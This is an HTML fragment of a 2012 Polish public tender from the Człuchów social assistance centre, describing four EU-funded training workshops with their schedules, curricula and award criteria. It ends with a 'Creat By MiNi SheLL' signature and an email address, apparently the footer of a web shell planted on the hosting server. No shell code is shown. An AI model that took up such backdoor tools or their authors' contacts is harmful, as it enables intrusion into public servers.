<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Człuchowie, ul. Średnia 14, 77-300 Człuchów, sekretariat pok.7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2012 godzina 09:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Człuchowie, ul. Średnia 14, 77-300 Człuchów, sekretariat pok.7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie jest współfinansowane z Unii Europejskiej w ramach środków Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki projekt pn.Promocja Integracji Społecznej na terenie miasta Człuchowa i projekt pn. Razem możemy więcej!...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> warsztaty psychologiczne -  podstawy komunikacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Nazwa projektu: Promocja Integracji Społecznej na terenie miasta Człuchów 2.Zakres przedmiotu zamówienia (liczba uczestników i godzin szkolenia): Zamawiający skieruje na warsztaty łącznie 15 osób, w jednej grupie szkoleniowej. Uczestnikami warsztatów będą klienci MOPS. Całkowita liczba godzin:  32 godziny. Zajęcia winny odbywać się w dni powszednie (od poniedziałku do piątku) w godzinach od 8.00 do 15.00, minimalnie 4 a maksymalnie 6 godzin dziennie. Zajęcia odbywać się winny maksymalnie 3 dni w tygodniu. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę,  niedzielę oraz dni ustawowo wolne od pracy.Na 1 godzinę szkolenia przypada 45 minut zajęć dydaktycznych i 15 minut przerwy; istnieje możliwość kumulowania przerw, jednakże nie więcej niż 2 przerwy łącznie. 3. Miejsce realizacji szkolenia: Zamawiający wymaga, aby zajęcia odbywały się: sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14 77-300 Człuchów. Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart.  W trakcie zajęć powinny być zapewnione warunki pracy zgodnie z przepisami BHP; Instrukcją Bezpieczeństwa Pożarowego. 4.Termin realizacji szkolenia: Od marca 2012r. maksymalnie do 30.06.2012. 5.Minimalny zakres programowy - opis modułów szkoleniowych:MODUŁ I - Trening intra- i interpersonalny:	Orientacja i integracja;Indywidualizacja i relacje;Zawiązanie współpracy; MODUŁ II - Warsztaty umiejętności psychospołecznych:Emocje w cyklu zmiany.Budowania poczucia własnej wartości.Radzenie sobie ze stresem.MODUŁ III - Warsztaty umiejętności psychospołecznych: Komunikacja interpersonalna.Postawa asertywna. Autoprezentacja. MODUŁ IV - Coaching grupowy:Wyznaczanie i osiąganie celów. Grupowe rozwiązywanie problemów.	Ewaluacja procesu.
6.Metody prowadzenia zajęć: Zamawiający wymaga, aby w co najmniej 70% zajęcie były prowadzone metodami aktywizującymi grupę szkoleniową. 7.  Koszty materiałów szkoleniowych. Wykonawca pokrywa koszty przygotowania materiałów szkoleniowych. Materiały przekazywane uczestnikom winny być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z informacją o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający natomiast zabezpiecza uczestnikom warsztatów materiały piśmiennicze (notatnik, długopis itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. doświadczenie - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> warsztaty z zakresu aktywnego poszukiwania pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Nazwa projektu:  Promocja Integracji Społecznej na terenie miasta Człuchów.2.Zakres przedmiotu zamówienia (liczba uczestników i godzin szkolenia):Zamawiający skieruje na warsztaty łącznie 14 osób, w jednej grupie szkoleniowej. Uczestnikami warsztatów będą klienci MOPS.Całkowita liczba godzin:  32 godziny Zajęcia winny odbywać się w dni powszednie (od poniedziałku do piątku) w godzinach od 8.00 do 15.00, minimalnie 4 a maksymalnie 6 godzin dziennie i maksymalnie 2 dni w tygodniu. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę,  niedzielę oraz dni ustawowo wolne od pracy.Uwaga: na 1 godzinę szkolenia przypada 45 minut zajęć dydaktycznych i 15 minut przerwy; istnieje możliwość kumulowania przerw, jednakże nie więcej niż 2 przerwy łącznie. 3. Miejsce realizacji szkolenia: Zamawiający wymaga, aby: zajęcia odbywały się: sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14 77-300 Człuchów, Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart . W trakcie zajęć powinny być zapewnione warunki pracy zgodnie z przepisami BHP; Instrukcją Bezpieczeństwa Pożarowego. 4.Termin realizacji szkolenia: Od marca 2012r. maksymalnie do 30.06.2012. 5.  Minimalny zakres programowy: Integracja grupy.Praca, bezrobocie - decyzje zawodowe.Bilans umiejętności, możliwości i predyspozycji zawodowych.Rynek pracy. Przedsiębiorczość - pomysł na własną firmę.Dokumenty aplikacyjne. Poszukiwanie ofert pracy.	 Umiejętności interpersonalne i rozmowa kwalifikacyjna. 6. Metody prowadzenia zajęć: 	Zamawiający wymaga, aby w co najmniej 60% zajęcia były prowadzone metodami aktywizującymi grupę szkoleniową. 7. Koszty materiałów szkoleniowych: Wykonawca pokrywa koszty przygotowania materiałów szkoleniowych. Materiały przekazywane uczestnikom winny być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z informacją o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający natomiast zabezpiecza uczestnikom warsztatów materiały piśmiennicze (notatnik, długopis itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. doświadczenie - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> warsztaty z zakresu wizażu i stylizacji z elementami autoprezentacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Nazwa projektu:Promocja Integracji Społecznej na terenie miasta Człuchów, 2. Zakres przedmiotu zamówienia (liczba uczestników i godzin szkolenia):Zamawiający skieruje na warsztaty łącznie 10 osób, w jednej grupie szkoleniowej. Uczestnikami warsztatów będą klienci MOPS. Całkowita liczba godzin:  25 godzin. Zajęcia winny odbywać się w dni powszednie (od poniedziałku do piątku) w godzinach od 8.00 do 15.00, 5 godzin tygodniowo. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz dni ustawowo wolne od pracy.Uwaga: na 1 godzinę szkolenia przypada 45 minut zajęć dydaktycznych i 15 minut przerwy; istnieje możliwość kumulowania przerw, jednakże nie więcej niż 2 przerwy łącznie. 3. Miejsce realizacji szkolenia: Zamawiający wymaga, aby: zajęcia odbywały się: sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14 77-300 Człuchów.Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart. W trakcie zajęć powinny być zapewnione warunki pracy zgodnie z przepisami BHP; Instrukcją Bezpieczeństwa Pożarowego  4. Termin realizacji szkolenia:Od marca 2012r. maksymalnie do 30.06.2012.
5. Minimalny zakres programowy: Mój wizerunek, Wywieranie wrażenia.Etykieta biznesu w zakresie garderoby, dodatków, fryzur, makijażu.	Jak zgrać własny wygląd zewnętrzny, rodzaj urody i osobowość z rodzajem pracy. Analiza kolorystyczna  - dobór palety barw, Dobór fryzury - propozycje koloru i fryzur dobrane indywidualnie.	Stylizacja biznesowa - właściwe fasony ubrań, desenie  i materiały współgrające z typem figury. Dodatki: buty, torebki, apaszki, biżuteria. Autoprezentacja Kontrola własnego wizerunku. 	Psychologiczne znaczenie dobrego wizerunku.	Image spójny i jednoznaczny. 	Techniki autoprezentacyjne. Asertywność, czyli otwarte wyrażanie siebie i wyznaczanie własnych granic.	Pozytywna autoprezentacja w oparciu o własne doświadczenia, umiejętności, zasoby. Pisemny autoportret. Komunikacja interpersonalna. Komunikacja werbalna i niewerbalna. Wywieranie wpływu poprzez język ciała.Świadomość siebie i innych w procesie komunikacji interpersonalnej. Wizaż i stylizacja. Analiza kolorystyczna.	Makijaż dzienny bez koloru.Makijaż dzienny z kolorem wg analizy kolorystycznej. 6. Metody prowadzenia zajęć: Zamawiający wymaga, aby w co najmniej 60% zajęcia były prowadzone metodami aktywizującymi grupę szkoleniową. 7. Koszty materiałów szkoleniowych:Wykonawca pokrywa koszty przygotowania materiałów szkoleniowych. Materiały przekazywane uczestnikom winny być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z informacją o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający natomiast zabezpiecza uczestnikom warsztatów materiały piśmiennicze (notatnik, długopis itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. doświadczenie - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> warsztaty psychospołeczne pn. Poznajmy siebie z zakresu komunikacji, asertywności, radzenia sobie ze stresem, współpracy i umiejętności pracy w zespole, współdziałania w grupie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Nazwa projektu:Razem możemy więcej!.2.Zakres przedmiotu umowy zamówienia (liczba uczestników i godzin szkolenia): Zamawiający skieruje na warsztaty łącznie 10 osób, w jednej grupie.Uczestnikami warsztatów będą członkowie Klubu Abstynenta.Całkowita liczba godzin:  72 godziny, z zastrzeżeniem,  24 godziny zajęć warsztatowych w sali szkoleniowej i 48 godzin zajęć warsztatowych- praktycznych w plenerze, przy konstruowaniu wiaty.   Koszt materiałów do budowy wiaty, wynagrodzenia dla  osoby nadzorującej budowę wiaty pokrywa Zamawiający. Ponadto zamawiający wymaga aby zajęcia  zostały zrealizowane przez 2 soboty w godzinach od 16.30 do 20.30(4godziny) i 2 niedziele w godzinach od 9.00 do 17.00 (8godzin)dla zajęć warsztatowych oraz przez 4 soboty w godzinach od 16.30 do 20.30(4godziny) i 4 niedziele w godzinach od 9.00 do 17.00(8godzin)  dla zajęć warsztatowych - praktycznych.Uwaga: na 1 godzinę szkolenia przypada 45 minut zajęć dydaktycznych i 15 minut przerwy; istnieje możliwość kumulowania przerw jednakże nie więcej niż dwie przerwy łącznie. 3. Miejsce realizacji szkolenia:	Zamawiający wymaga, aby: zajęcia odbywały się: sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14 77-300 Człuchów lub w siedzibie Klubu Abstynenta KROKUS  przy ul. Szkolnej 1 77-300 Człuchów. Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart: w trakcie zajęć powinny być zapewnione warunki pracy zgodnie z przepisami BHP; Instrukcią Bezpieczeństwa Pożarowego. 4.Termin realizacji szkolenia:Od marca 2012r. maksymalnie do 31 maja 2012. 5.Minimalny zakres programowy:Emocje.Budowania poczucia własnej wartości.Radzenie sobie ze stresem.Poznanie samego siebie.Komunikacja interpersonalna.Postawa asertywna.Wyznaczanie i osiąganie celów.Grupowe rozwiązywanie problemów.Ewaluacja procesu.Role pełnione w grupie.Mocne i słabe strony.Umiejętność współdziałania i współpracowania w grupie.6.Metody prowadzenia zajęć:	Zamawiający wymaga, aby w co najmniej 70% zajęcie były prowadzone metodami aktywizującymi grupę szkoleniową.7.	Koszty materiałów szkoleniowych. Wykonawca pokrywa koszty przygotowania materiałów szkoleniowych. Materiały przekazywane uczestnikom winny być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z informacją o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający natomiast zabezpiecza uczestnikom warsztatów materiały piśmiennicze (notatnik, długopis itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. doświadczenie - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com